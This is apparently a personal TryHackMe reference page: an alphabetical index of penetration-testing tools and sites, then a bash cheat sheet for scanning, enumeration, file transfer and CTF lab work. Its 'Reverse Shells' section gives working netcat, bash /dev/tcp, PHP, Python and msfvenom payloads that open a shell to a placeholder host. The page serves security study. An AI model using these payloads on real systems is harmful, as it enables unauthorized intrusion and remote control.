
THM | TryHackMe: Tools


TryHackMe Badge - DFTF@PConsole# (DFTFPConsole)


INDEX: 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z


A

  • AbuseIPDB: helps make the Web safer by providing a central blacklist where webmasters, system administrators, and other interested parties can report and look up IP addresses associated with malicious online activity (abuseipdb.com)
  • ARIN - Search: Search ARIN Site or Whois (arin.net)
  • ASCII Table: ASCII Character Codes, HTML, Octal, Hex, Decimal (asciitable.com)
  • AttackerKB: Community-driven information, analysis, and discussion of vulnerabilities and threats (attackerkb.com)

B

  • BeEF: is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser (beefproject.com)
  • BloodHound: uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment (kali.org | github.com)
  • BuiltWith: Find out what websites are Built With (builtwith.com)
  • Burp Suite: is an integrated platform/graphical tool for performing security testing of web applications (portswigger.net)

C

  • CeWL: Custom Word List generator is a Ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used with password crackers such as John the Ripper (kali.org | github.com)
  • Cisco Talos Intelligence Group: Search by IP, domain, or network owner for real-time threat data; File Reputation; Email & Spam Data (talosintelligence.com)
  • Command Injection Payload List: Cheat sheet/List (github.com)
  • CrackStation: Free Password Hash Cracker (crackstation.net)
  • Crt.sh: a site where you can look up all the SSL/TLS certificates issued for a particular domain via Certificate Transparency logs (crt.sh)
  • Curl: is used in command lines or scripts to transfer data (curl.se)
  • CVE: is a list of publicly disclosed cybersecurity vulnerabilities (cve.org | cve.mitre.org)
  • CVE Details: CVE security vulnerability database (Security vulnerabilities, exploits, references) (cvedetails.com)
  • CyberChef: The Cyber Swiss Army Knife; a web app for encryption, encoding, compression and data analysis (github.io)

D

  • Devhints: a "modest" collection of cheatsheets (devhints.io)
  • DIRB: is a Web Content Scanner (kali.org | sourceforge.net)
  • Dirbuster: is a multi-threaded Java application designed to brute force directory and file names on web/application servers (kali.org)
  • Django: is a high-level Python web framework that encourages rapid development and clean, pragmatic design (djangoproject.com)
  • DNSdumpster: is a free domain research tool that can discover hosts related to a domain (dnsdumpster.com)
  • Dnsrecon: is a simple Python script for gathering DNS-oriented information about a given target (kali.org | github.com)

E

  • Enum4linux: is a tool for enumerating information from Windows and Samba systems (kali.org | github.com)
  • Evil-Winrm: is the ultimate Windows Remote Management shell for hacking/pentesting (kali.org | github.com)
  • ExifTool: is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files (exiftool.org)
  • Exploit Database: is a CVE compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers (exploit-db.com)
  • Exploitdb: Searchable archive from The Exploit Database (kali.org | exploit-db.com)

F

  • Ffuf: is a fast web fuzzer written in Go that allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing (kali.org | github.com)
  • FoxyProxy: simplifies configuring browsers to access proxy servers (getfoxyproxy.org)
  • fuzzdb/ - FuzzDB: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery (github.com)

G

  • Gobuster: is a tool used to brute-force URIs including directories and files as well as DNS subdomains (kali.org | github.com)
  • Google Hacking Database: The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers (exploit-db.com)
  • GTFOBins: is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems (gtfobins.github.io)

H

  • HAITI: A CLI tool (and library) to identify hash types (hash type identifier) (noraj.github.io)
  • Hash-Identifier: Software to identify the different types of hashes used to encrypt data and especially passwords (kali.org | github.com)
  • Hashcat: supports five unique modes of attack for over 300 highly-optimized hashing algorithms (kali.org | hashcat.net)
  • Hashcat - Example hashes: a list of hashes (hashcat.net)
  • Hashes.com: is a hash lookup service. This allows you to input a hash and search for its corresponding plaintext in their database of already-cracked hashes (hashes.com)
  • HashID: is a tool written in Python 3 which supports the identification of over 220 unique hash types using regular expressions (pypi.org | github.com)
  • Hunter: Get the email addresses behind any website (hunter.io)
  • Hurl: hexadecimal & URL encoder + decoder (kali.org | github.com)
  • Hydra: is a parallelized login cracker which supports numerous protocols to attack (kali.org | github.com)

I

  • impacket/ - Impacket: is a collection of Python classes for working with network protocols (kali.org | github.com | secureauth.com)
  • Internet Archive: is a non-profit library of millions of free books, movies, software, music, websites, and more (archive.org)

J

  • John the Ripper: is a tool designed to help systems administrators to find weak (easy to guess or crack through brute force) passwords (kali.org | openwall.com)
  • JRuby/ - JRuby: is a high performance, stable, fully threaded Java implementation of the Ruby programming language (jruby.org)
  • JythonStandalone/ - Jython: The Jython project provides implementations of Python in Java, providing to Python the benefits of running on the JVM and access to classes written in Java (jython.org)

K

  • Kali Linux Metapackages: metapackages allow for easy installation of certain tools in a specific field, or alternatively, for the installation of a full Kali suite (kali.org)
  • KaliWordlists/ - Wordlists: This contains the rockyou.txt wordlist (kali.org)
  • kerbrute/ - Kerbrute: A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (github.com)

L

  • LinEnum/ - LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks (github.com)
  • Linux man pages: documents the Linux kernel and C library interfaces that are employed by user-space programs (linux.die.net)
  • linux-smart-enumeration/ - Linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels (github.com)
  • LOLBAS project: The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques (lolbas-project.github.io)
  • lyricpass/ - Lyricpass: Password wordlist generator using song lyrics for targeted bruteforce audits / attacks (github.com)

M

  • MD5 Collision Demo: Collisions in the MD5 cryptographic hash function (mscs.dal.ca)
  • mentalist/ - Mentalist: is a graphical tool for custom wordlist generation (github.com)
  • Metasploit Framework: is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools (kali.org | metasploit.com)
  • Mimikatz: uses admin rights on Windows to display passwords of currently logged in users in plaintext (kali.org | blog.gentilkiwi.com)
  • MSFvenom: is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance (offensive-security.com)

N

  • National Vulnerability Database: The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP) (nvd.nist.gov)
  • Nessus: is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network (tenable.com)
  • NetWitness Platform: is a network security company that provides real-time network forensics automated threat detection, response, and analysis solutions (netwitness.com)
  • NetworkMiner: is a Network Forensic Analysis Tool (NFAT) for Windows (netresec.com)
  • Nikto: is a pluggable web server and CGI scanner written in Perl, using rfp’s LibWhisker to perform fast security or informational checks (kali.org | github.com)
  • Nmap: is a utility for network exploration or security auditing (kali.org | nmap.org)

O

  • OpenVPN: is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities (openvpn.net)
  • openvpn-troubleshooting/ - TryHackMe OpenVPN Troubleshooting Script: Script to troubleshoot connectivity to the TryHackMe network using OpenVPN on Linux (github.com)
  • OWASP: The Open Web Application Security Project is a nonprofit foundation that works to improve the security of software (owasp.org)
  • OWASP favicon database: favicon database in wiki format (owasp.org)

P

  • PayloadsAllTheThings/ - Payloads All The Things, swisskyrepo: A list of useful payloads and bypass for Web Application Security and Pentest/CTF (github.com)
  • PEASS-ng/ - PEASS-ng: Privilege Escalation Awesome Scripts SUITE new generation (github.com)
  • PeopleFinder: Police Records, Background Checks, Social Media, Photos, Assets, Contact Information and Much More (peoplefinder.com)
  • Pentestmonkey: Cheat sheets, Web shells, User Enumeration, Audit, etc. (github.com | pentestmonkey.net)
  • pnwgen/ - Pnwgen: A very flexible phone number wordlist generator (github.com)
  • PowerShell: is a cross-platform (Windows, Linux, and macOS) automation and configuration tool/framework that works well with your existing tools and is optimized for dealing with structured data (e.g. JSON, CSV, XML, etc.), REST APIs, and object models (docs.microsoft.com | github.com)
  • PowerSploit/ - PowerSploit: is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests (kali.org | github.com)
  • Pwntools: is a CTF framework and exploit development library (docs.pwntools.com | github.com)
  • Python Package Index: PyPI is a repository of software for the Python programming language (pypi.org)
  • PythonAnywhere: makes it easy to create and run Python programs in the cloud (pythonanywhere.com)

R

  • Rawsec's CyberSecurity Inventory: An inventory of tools and resources about CyberSecurity (inventory.raw.pm)
  • RegExr: is a HTML/JS based tool for creating, testing, and learning about Regular Expressions (regexr.com)
  • RequestBin: gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way (requestbin.com)
  • RexEgg: Regular Expressions Tutorial. Comprehensive resource covering basic to advanced uses of regex. Includes regex cheat sheet, tools, books and tricks (rexegg.com)
  • RsaCtfTool: RSA attack tool (mainly for CTFs); retrieve the private key from a weak public key and/or decipher data (github.com)

S

  • Samba: is the standard Windows interoperability suite of programs for Linux and Unix. Running on a Unix system, it allows Windows to share files and printers on the Unix host, and it also allows Unix users to access resources shared by Windows systems (samba.org)
  • Scapy: is a Python program that enables the user to send, sniff and dissect and forge network packets (scapy.readthedocs.io | github.com)
  • SecLists/ - SecLists: is a collection of multiple types of lists used during security assessments (kali.org | owasp.org)
  • SHAttered: SHA-1 Collision Attacks (File tester) (shattered.io)
  • Shodan: is a search engine scanning the entirety of the internet for connected devices (shodan.io)
  • Smtp-User-Enum: Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO (kali.org | pentestmonkey.net)
  • Snort: is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) (snort.org)
  • Socat: (for SOcket CAT) establishes two bidirectional byte streams and transfers data between them (kali.org)
  • static-binaries/ - Static-binaries: Various nix tools built as statically-linked binaries (github.com)
  • Sublist3r: Fast subdomains enumeration tool for penetration testers (kali.org | github.com)

T

  • Tmux: enables a number of terminals (or windows) to be accessed and controlled from a single terminal like screen (kali.org | github.com)
  • Tor Browser: prevents someone watching your connection from knowing what websites you visit (torproject.org)
  • TTPassGen: is a highly flexible and scriptable password dictionary generator based on Python; you can easily use various rules to generate the desired combinations of words (github.com)
  • TunnelsUP - Hash Analyzer: Tool to identify hash types (tunnelsup.com)

U

  • User-Agent Switcher and Manager: A User-Agent spoofer browser extension that is highly configurable (github.com | add0n.com)

W

  • Wappalyzer: Find out the technology stack of any website (wappalyzer.com)
  • Web.dev - Measure: Measure page quality (web.dev)
  • Well-known Ports: table of the 1024 common ports (vmaxx.net)
  • Wfuzz: is a tool designed for bruteforcing Web Applications (kali.org | edge-security.com)
  • Who.is: Large database of whois information, DNS, domain names, name servers, IPs, and tools for searching and monitoring domain names (who.is)
  • Whois.com: The Whois database contains details such as the registration date of the domain name, when it expires, ownership and contact information, nameserver information of the domain, the registrar via which the domain was purchased, etc (whois.com)
  • Whois: provides a commandline client for the WHOIS (RFC 3912) protocol, which queries online servers for information such as contact details for domains and IP address assignments (kali.org | github.com)
  • WiGLE: Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers (wigle.net)
  • Windows Subsystem for Linux: WSL lets developers run a GNU/Linux environment - including most command-line tools, utilities, and applications - directly on Windows, unmodified, without the overhead of a traditional virtual machine or dual-boot setup (microsoft.com)
  • Wireshark: is the world's foremost and widely-used network protocol analyzer. It lets you see what's happening on your network at a microscopic level (kali.org | wireshark.org)
  • wordlistctl/ - Wordlistctl: Fetch, install and search wordlist archives from websites and torrent peers (github.com | blackarch.org)

X

  • XFreeRDP: is a Remote Desktop Protocol (RDP) implementation (kali.org | freerdp.com)
  • XSS Hunter: allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS (xsshunter.com)
  • XSS Payloads: The wonderland of JavaScript unexpected usages, and more (xss-payloads.com)

Y

  • Yandex Images: search for images online (yandex.com)

Helpful List of Bash Scripts, Commands and Inputs

Alias (~/.bash_aliases)

  • CdThm: /TryHackMe
  • CdThmRooms: /TryHackMe/Rooms
  • CdThmTools: /TryHackMe/Tools
  • CdThmVpn: /TryHackMe/VPN

Directory Brute Force

Gobuster

gobuster dir -u http://<IP>/ -w ../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster_1.txt -x .php,.html,.txt

Dirb

dirb http://<IP> ../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt -w -X .php,.html,.txt | tee scans/dirb_1.txt

Git

Associate a file in your repository with Git LFS

git lfs track "*.<FILETYPE>"

Manipulate Files & Directories

Create a directory

mkdir scans

Change Directory

cd TryHackMe/Tools
cd TryHackMe/Rooms
cd TryHackMe/VPN

Change Mode

chmod 600 id_rsa
chmod +x lse.sh
chmod u+s <FILE_NAME>

Move Files

mv <SOURCE_FILE> <DESTINATION_FILE>

Copy

cp <PATH/SOURCE_FILE> <PATH/DESTINATION_FILE>
cp --recursive <SOURCE_FOLDER> <DESTINATION_FOLDER>

Upload

scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_PATH>
curl --upload-file <FILE> -u '<USER>' smb://<IP>/<SHARE_NAME>/

Download

scp <USER>@<IP>:<SOURCE_FILE> <DESTINATION_PATH>
wget "http://<IP>:<PORT>/<RESOURCE>" -O <OUTPUT_NAME>

Append to end of file

echo "<TEXT>" >> <FILE>

Nmap

Quick Scan with Scripts Check

nmap -sV -sC -oN scans/nmap_1.txt <IP>

All ports

nmap -p- -sV -sC -oN scans/nmap_2.txt <IP>

Aggressive Scan

nmap -p0- -v -A -T4 -oN scans/nmap_3.txt <IP>

HTTP Script

nmap --script http-enum -v <IP> -p80 -oN scans/nmap_4.txt

DNS Script

nmap --script dns-brute -v <IP> -p80,443 -oN scans/nmap_5.txt

SMB Script

nmap --script smb-enum-users.nse -p445 <IP> -oN scans/nmap_6.txt
nmap --script smb-brute.nse -p445 <IP> -oN scans/nmap_7.txt
nmap --script smb-enum-shares -p139 <IP> -oN scans/nmap_8.txt

Vulnerability Script

nmap --script vulners,vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -sV -p<PORTS> <IP> -oN scans/nmap_9.txt

LDAP Script

nmap -p 389 --script ldap-search <IP> -oN scans/nmap_10.txt

OpenVPN

sudo openvpn THM-DFTFPConsole-EU-Regular-1.ovpn
sudo openvpn THM-DFTFPConsole-EU-VIP-1.ovpn
sudo openvpn THM-DFTFPConsole-EU-VIP-2.ovpn

Operating System (AttackBox)

To re-synchronize the package index files from their sources

sudo apt-get update

To install the newest versions of all packages currently installed on the system

sudo apt-get upgrade

In addition to performing the function of upgrade, this option also intelligently handles changing dependencies with new versions of packages

sudo apt-get dist-upgrade

All-in-one, combine commands with &&

sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

Kali Linux Metapackages: this package includes all of the tools you are familiar with in Kali

sudo apt install -y kali-linux-full

Interface configuration: displays information about all network interfaces currently in operation

ifconfig

Primary Prompt String (PS1)

dftfpconsole@PC-DFTF-PConsole:/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;34m\]\u\[$(tput sgr0)\]@\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;34m\]\h\[$(tput sgr0)\]:\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] PC-DFTF-PConsole:dftf$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;40m\]\h\[$(tput sgr0)\]:\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] $

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput bold)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] /mnt/c/Users/dftf$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] 0$

export PS1="[\[$(tput sgr0)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;13m\]\l\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

[12:30:01] dftf$

export PS1="[\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;226m\]\t\[$(tput sgr0)\]] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\W\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

dftfpconsole:/mnt/c/Users/dftf$

export PS1="\[$(tput bold)\]\[\033[38;5;2m\]\u\[$(tput sgr0)\]:\[$(tput sgr0)\]\[\033[38;5;27m\]\w\[$(tput sgr0)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

┌──(dftfpconsole)──[/mnt/c/Users/dftf] 0
└─$

export PS1="\n\[$(tput sgr0)\]\[\033[38;5;2m\]┌──(\[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;27m\]\u\[$(tput sgr0)\]\[\033[38;5;2m\])──[\[$(tput sgr0)\]\[$(tput bold)\]\w\[$(tput sgr0)\]\[\033[38;5;2m\]]\[$(tput sgr0)\] \[$(tput sgr0)\]\[$(tput bold)\]\[\033[38;5;13m\]\l\[$(tput sgr0)\]\n\[$(tput sgr0)\]\[\033[38;5;2m\]└─\[$(tput sgr0)\]\[$(tput bold)\]\\$\[$(tput sgr0)\] \[$(tput sgr0)\]"

Privilege Escalation Scripts

../../Tools/PEASS-ng/linpeas.sh
../../Tools/LinEnum/LinEnum.sh
../../Tools/linux-smart-enumeration/lse.sh

Reverse Shells

Listen

nc -lnvp <PORT>

Netcat

nc <IP> <PORT> -c bash

Bash

/bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

PHP

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'"); phpinfo(); ?>

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Metasploit Reverse TCP Windows

msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f exe -o ./reverseshell.exe

SMB

See what shares are on the host

smbclient -L <IP>
smbmap -H <IP>

Connect

smbclient //<IP>/<SHARE_NAME>
smbclient //<IP>/<SHARE_NAME> -U <USERNAME> <PASSWORD>

SSH

ssh <USER>@<IP>
ssh -i id_rsa <USER>@<IP>

Webserver

python3 -m http.server

Wordlists

../../Tools/KaliWordlists/rockyou.txt
../../Tools/KaliWordlists/dirbuster/directory-list-2.3-small.txt
../../Tools/KaliWordlists/dirbuster/directory-list-2.3-medium.txt
../../Tools/SecLists/Discovery/Web-Content/common.txt
../../Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt

🔙 Main

Rooms are virtual classrooms dedicated to particular cyber security topics.